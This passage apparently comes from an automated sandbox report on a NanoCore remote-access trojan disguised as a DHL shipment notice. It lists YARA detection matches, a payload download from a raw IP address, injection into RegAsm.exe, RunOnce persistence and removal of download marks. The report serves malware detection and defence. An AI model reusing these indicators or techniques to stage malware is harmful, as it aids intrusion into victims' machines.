        Source: global trafficHTTP traffic detected: GET /moss/nancata_RbkGW109.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /moss/nancata_RbkGW109.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 178.32.63.50Cache-Control: no-cache
        Source: RegAsm.exe, 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee2e44c.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee1e44c.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 35.2.RegAsm.exe.1ee22a75.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 37.2.RegAsm.exe.1ee32a75.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6396, type: MEMORYSTR

        System Summary:

        barindex
        Potential malicious icon foundShow sources
        Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
        Malicious sample detected (through community Yara rule)Show sources
        Source: 35.2.RegAsm.exe.1ddf3f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 37.2.RegAsm.exe.1de03f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 35.2.RegAsm.exe.1ee1e44c.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 37.2.RegAsm.exe.1ee2e44c.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 37.2.RegAsm.exe.1ee2e44c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 35.2.RegAsm.exe.1ee1e44c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 35.2.RegAsm.exe.1ee22a75.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 37.2.RegAsm.exe.1ee32a75.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegAsm.exe PID: 6396, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: 35.2.RegAsm.exe.1ddf3f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 35.2.RegAsm.exe.1ddf3f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 37.2.RegAsm.exe.1de03f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 37.2.RegAsm.exe.1de03f10.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 35.2.RegAsm.exe.1ee1e44c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 35.2.RegAsm.exe.1ee1e44c.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 37.2.RegAsm.exe.1ee2e44c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 37.2.RegAsm.exe.1ee2e44c.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 37.2.RegAsm.exe.1ee2e44c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 37.2.RegAsm.exe.1ee2e44c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 35.2.RegAsm.exe.1ee1e44c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 35.2.RegAsm.exe.1ee1e44c.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 37.2.RegAsm.exe.1ee29616.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 35.2.RegAsm.exe.1ee19616.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 35.2.RegAsm.exe.1ee22a75.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 35.2.RegAsm.exe.1ee22a75.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 37.2.RegAsm.exe.1ee32a75.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 37.2.RegAsm.exe.1ee32a75.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000025.00000002.1829914216.000000001DDE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000025.00000002.1830216600.000000001EDE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000023.00000002.1758980906.000000001DDD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000023.00000002.1759375116.000000001EDD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 4328, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegAsm.exe PID: 6396, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 35_2_00C2E14E
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 35_2_1DD738E8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 35_2_1DD72438
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 35_2_1DD73040
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 35_2_1DD73107
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 37_2_00D0E14E
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 37_2_20052438
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 37_2_200538E8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 37_2_20053107
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 37_2_20053040
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess Stats: CPU usage > 98%
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe, 00000006.00000000.572154588.0000000000418000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMESALLIANCER.exe vs nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeBinary or memory string: OriginalFilenameMESALLIANCER.exe vs nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: Rotacism6.exe.19.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Driftigt\Rotacism6.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Driftigt\Rotacism6.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: edgegdi.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: sfc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: edgegdi.dll
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeVirustotal: Detection: 29%
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeReversingLabs: Detection: 13%
        Source: nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Users\user\Driftigt\Rotacism6.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Users\user\Driftigt\Rotacism6.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: unknownProcess created: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe 'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\Driftigt\Rotacism6.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: unknownProcess created: C:\Users\user\Driftigt\Rotacism6.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Users\user\Driftigt\Rotacism6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Driftigt\Rotacism6.exe'
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\DriftigtJump to behavior
        Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@14/7@77/2
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9096:120:WilError_03
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{005eae7f-e51b-4c9c-bdf2-9db4e6863cb8}
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9096:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1624:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1624:304:WilStaging_02
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 6_2_00408ECD push edi; iretd
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 6_2_00406B5B push 8A084572h; ret
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 6_2_00407333 push esp; iretd
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeCode function: 6_2_02323812 push ds; iretd
        Source: C:\Users\user\Driftigt\Rotacism6.exeCode function: 21_2_02284D22 push eax; ret
        Source: C:\Users\user\Driftigt\Rotacism6.exeCode function: 21_2_0228555A push edi; ret
        Source: C:\Users\user\Driftigt\Rotacism6.exeCode function: 21_2_02282653 push es; iretd
        Source: C:\Users\user\Driftigt\Rotacism6.exeCode function: 21_2_022842F4 push 0000004Ch; retf
        Source: C:\Users\user\Driftigt\Rotacism6.exeCode function: 22_2_02CC2855 push eax; retf
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\Driftigt\Rotacism6.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Digressionernes8Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Digressionernes8Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Digressionernes8Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Digressionernes8Jump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | delete
        Source: C:\Users\user\Desktop\nDHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
